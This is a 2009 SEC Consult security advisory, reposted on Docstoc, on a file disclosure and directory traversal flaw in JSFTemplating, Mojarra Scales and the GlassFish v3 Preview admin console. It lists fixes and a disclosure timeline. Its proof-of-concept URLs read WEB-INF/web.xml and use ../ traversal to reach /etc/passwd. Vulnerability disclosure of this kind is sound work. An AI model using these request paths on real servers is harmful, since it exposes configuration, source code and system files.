Docstoc

JSFTemplating_ Mojarra Scales_ GlassFish File Disclosure Vulnerabilities

Document Sample
JSFTemplating_ Mojarra Scales_ GlassFish File Disclosure Vulnerabilities Powered By Docstoc
					               JSFTemplating, Mojarra Scales, GlassFish File Disclosure Vulnerabilities        Page 1/4
  1    SEC Consult Security Advisory < 20090901−0 >
  2    =======================================================================
  3                  title: File disclosure vulnerability in JSFTemplating,
  4                         Mojarra Scales and GlassFish Application Server v3 Admin
  5                         console
  6               products: JSFTemplating (FileStreamer/PhaseListener component)
  7                         Mojarra Scales
  8                         GlassFish Application Server v3 Preview (Admin console)
  9     vulnerable version: JSFTemplating: all versions < v1.2.11
  10                        Mojarra Scales: all versions < v1.3.2
  11                        GlassFish: v3 Preview
  12         fixed version: JSFTemplating: v1.2.11
  13                        Mojarra Scales: v1.3.2
  14                        GlassFish: v2 is not affected according to vendor
  15                impact: critical
  16              homepage: https://jsftemplating.dev.java.net
  17                        http://kenai.com/projects/scales
  18                        https://glassfish.dev.java.net
  19                 found: 2009−07−01
  20                    by: J. Greil / SEC Consult / www.sec−consult.com
  21   =======================================================================
  22
  23   Vendor description:
  24   −−−−−−−−−−−−−−−−−−−
  25   Templating for JavaServerâM−^D¢ Faces Technology plugs into JavaServerâM−^D¢ Faces to
  26   make building pages and components easy.
  27
  28   Creating pages or components is done using a template file. JSFTemplating’s
  29   design allows for multiple syntaxes, currently it supports 2 of its own plus
  30   most of the Facelets syntax. All syntaxes support all of JSFTemplating’s
  31   features such as PageSession, Events & Handlers, dynamic reloading of page
  32   conent, etc.
  33
  34   source: https://jsftemplating.dev.java.net/#what
  35   also see:
  36   http://kenai.com/projects/scales/
  37   https://glassfish.dev.java.net/
  38
  39
  40   Vulnerability overview/description:
  41   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  42   The JSFTemplating FileStreamer functionality (when using the PhaseListener),
  43   basically used for including static or dynamic content, such as Yahoo UI API
  44   files with Mojarra Scales, is vulnerable to
  45   * file disclosure and also allows an attacker
  46   * to retrieve directory listings of the whole server
  47
  48   Furthermore Mojarra Scales and the GlassFish Application Server (v3 Preview)
  49   Admin console are using vulnerable components too.
  50
  51   JSFTemplating/FileStreamer can be exploited to read sensitive application data
  52   on the whole server depending on the configuration. One tested server allowed
SEC Consult                                                                                    09/01/2009
                JSFTemplating, Mojarra Scales, GlassFish File Disclosure Vulnerabilities   Page 2/4
  53    us to access all files on the server (with rights of the webserver user),
  54    another server was restricted to files within the webroot (but including
  55    WEB−INF) − it might depend on the Java Security Model or filesystem rights.
  56
  57    An attacker is able to gain sensitive data such as configuration files
  58    (WEB−INF/web.xml), the whole source code of the application or other sensitive
  59    data on the server.
  60
  61    Furthermore it is possible to retrieve directory listings of directories on
  62    the whole server and the webroot by specifying a directory instead of a file.
  63
  64
  65    Proof of concept:
  66    −−−−−−−−−−−−−−−−−
  67    The URLs to exploit this vulnerability may differ from server to server. The
  68    vulnerable HTTP parameters are usually named "filename" or "file".
  69
  70    By specifying the following URLs an attacker gains access to sensitive
  71    configuration files, source code or other possibly sensitive files:
  72
  73    ========================
  74    /jsft_resource.jsf?contentSourceId=resourceCS&filename=WEB−INF/web.xml
  75    /jsft_resource.jsf?contentSourceId=resourceCS&filename=index.jsp
  76    /jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/
  77    /jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/some.class
  78    ========================
  79
  80
  81    By using an empty value for the file/filename parameter, a directory listing of
  82    the webroot is being shown. Directory traversal is also possible but it depends
  83    on the installation/configuration whether it is possible to access data outside
  84    the webroot.
  85
  86    ========================
  87    /scales_static_resource.jsf?file=
  88    /scales_static_resource.jsf?file=../../../../../../etc/
  89    /scales_static_resource.jsf?file=../../../../../../etc/passwd
  90    ========================
  91
  92
  93    Vulnerable versions:
  94    −−−−−−−−−−−−−−−−−−−−
  95    JSFTemplating:
  96    * all versions < v1.2.11
  97
  98    Mojarra Scales:
  99    * all versions < v1.3.2
  100
  101   GlassFish:
  102   * v3 Preview (Admin console)
  103
  104   According to the vendor, GlassFish v2 does not use vulnerable components.
SEC Consult                                                                                09/01/2009
                JSFTemplating, Mojarra Scales, GlassFish File Disclosure Vulnerabilities                           Page 3/4
  105
  106   Vendor contact timeline:
  107   −−−−−−−−−−−−−−−−−−−−−−−−
  108   2009−07−07: Contacting the developers of JSFTemplating by email.
  109   2009−07−07: Very fast response from the developers by email and IRC, initial
  110               attempts to fix the issue were being made
  111   2009−07−08: Agreed on taking a further look into the issue by the end of July
  112   2009−07−30: Contacted the developers again, they need more time
  113   2009−08−10/13: Asked the developers for any news
  114   2009−08−14: Anwser that the fix will make it into next release
  115   2009−08−31: Fixes for JSFTemplating and Mojarra Scales available
  116   2009−09−01: Coordinated release date
  117
  118   Special thanks to Jason and Ken!
  119
  120   Solution:
  121   −−−−−−−−−
  122   * Upgrade to the latest version of JSFTemplating, v1.2.11 has the fix:
  123   http://download.java.net/maven/1/com.sun.jsftemplating/jars/
  124
  125   CVS commit logs with some information regarding new security features can be
  126   found here:
  127   https://jsftemplating.dev.java.net/servlets/BrowseList?listName=cvs&by=date&from=2009−08−01&to=2009−08−31&first=1&cou
        nt=16
  128
  129
  130   * Upgrade to the latest version of Mojarra Scales, v1.3.2 has the fix:
  131   http://kenai.com/projects/scales/downloads/directory/Mojarra%20Scales%201.3.2/
  132
  133
  134   * GlassFish: Use the current stable version v2 or see workaround section for v3.
  135
  136   Workaround:
  137   −−−−−−−−−−−
  138   GlassFish v3 Preview: Use strong passwords for the GlassFish Admin console and
  139   restrict access to the Admin console port (4848).
  140
  141   Advisory URL:
  142   −−−−−−−−−−−−−
  143   https://www.sec−consult.com/advisories_e.html#a61
  144
  145   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  146   SEC Consult Unternehmensberatung GmbH
  147
  148   Office Vienna
  149   Mooslackengasse 17
  150   A−1190 Vienna
  151   Austria
  152
  153   Tel.: +43 / 1 / 890 30 43 − 0
  154   Fax.: +43 / 1 / 890 30 43 − 25
  155   Mail: research at sec−consult dot com
SEC Consult                                                                                                         09/01/2009
                JSFTemplating, Mojarra Scales, GlassFish File Disclosure Vulnerabilities   Page 4/4
  156   www.sec−consult.com
  157
  158   SEC Consult conducts periodical information security workshops on ISO
  159   27001/BS 7799 in cooperation with BSI Management Systems. For more
  160   information, please refer to https://www.sec−consult.com/academy_e.html
  161
  162   EOF J. Greil / @2009
  163
  164   # milw0rm.com [2009−09−01]




SEC Consult                                                                                09/01/2009

				
DOCUMENT INFO